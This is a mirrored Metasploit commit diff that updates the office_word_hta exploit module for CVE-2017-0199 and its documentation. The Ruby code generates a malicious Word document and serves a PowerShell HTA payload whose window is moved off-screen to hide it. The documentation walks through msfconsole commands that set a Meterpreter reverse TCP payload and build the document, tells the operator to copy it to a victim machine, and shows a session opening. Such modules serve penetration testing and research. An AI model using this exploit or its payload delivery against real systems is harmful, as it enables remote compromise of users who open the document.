infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use a built-in HTA server and update doc

bug/bundler_fix
wchen-r7 2017-04-24 16:04:27 -05:00
parent 0a085c4e83
commit 6029a9ee2b
2 changed files with 54 additions and 66 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

79
documentation/modules/exploit/windows/fileformat/office_word_hta.md
View File

@ -34,74 +34,35 @@ The attack involves a threat actor emailing a Microsoft Word document to a targe
## Verification Steps
1. Start msfconsole
2. Do: ```use exploit/windows/misc/hta_server```
3. Do: ```set URIPATH /cve-2017-0199```
3. Do: ```run```
4. Do: ```use exploit/windows/fileformat/office_word_hta```
5. Do: ```set FILENAME msf.doc```
6. Do: ```set TARGETURI http://xxx.xxx.xxx.xxx:8080/cve-2017-0199```
7. Do: ```exploit -j```
2. Do: ```use exploit/windows/fileformat/office_word_hta```
3. Do: ```set payload [PAYLOAD NAME]```
3. Do: ```exploit```
## Demo
```
msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options
Module options (exploit/windows/misc/hta_server):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Powershell x86
msf exploit(hta_server) > run
$ msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_word_hta) > set lhost 192.168.146.1
lhost => 192.168.146.1
msf exploit(office_word_hta) > set srvhost 192.168.146.1
srvhost => 192.168.146.1
msf exploit(office_word_hta) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.97.100.101:4444
[*] Using URL: http://0.0.0.0:8080/ETTtwiMhS.hta
[*] Local IP: http://10.00.100.101:8080/ETTtwiMhS.hta
[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.
```
After you have the malicious doc file and servers ready, copy the doc file onto the victim machine,
and open it with Microsoft Office Word. You should receive a session:
```
msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > show options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no The file name.
TARGETURI http://example.com/test.rtf yes The path to a online hta file.
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
msf exploit(office_word_hta) > set TARGETURI http://10.97.100.101:8080/ETTtwiMhS.hta
TARGETURI => http://10.00.100.101:8080/ETTtwiMhS.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
FILENAME => msf.doc
msf exploit(office_word_hta) > run
[+] msf.doc stored at /Users/securitytest/.msf4/local/msf.doc
[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
```
Copy /Users/securitytest/.msf4/local/msf.doc into the victim machine, and open it with Microsoft Office Word. A meterpreter will be gained.

41
modules/exploits/windows/fileformat/office_word_hta.rb
View File

@ -7,9 +7,10 @@ require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
@ -31,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
'wdormann',
'DidierStevens',
'vysec',
'Nixawk' # module developer
'Nixawk', # module developer
'sinn3r' # msf module improvement
],
'License' => MSF_LICENSE,
'References' => [
@ -55,20 +57,27 @@ class MetasploitModule < Msf::Exploit::Remote
[
[ 'Microsoft Office Word', {} ]
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 14 2017'))
register_options(
[
OptString.new('TARGETURI', [ true, 'The path to a online hta file.', 'http://example.com/test.rtf'])
], self.class)
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta'])
], self.class)
end
def generate_uri
uri_maxlength = 112
uri = datastore['TARGETURI']
host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
scheme = datastore['SSL'] ? 'https' : 'http'
uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
uri.delete!("\n")
uri.delete!("\\x")
@ -126,7 +135,25 @@ class MetasploitModule < Msf::Exploit::Remote
data
end
def on_request_uri(cli, req)
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win' }
)
# This allows the HTA window to be invisible
data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def exploit
file_create(create_rtf_format)
super
end
end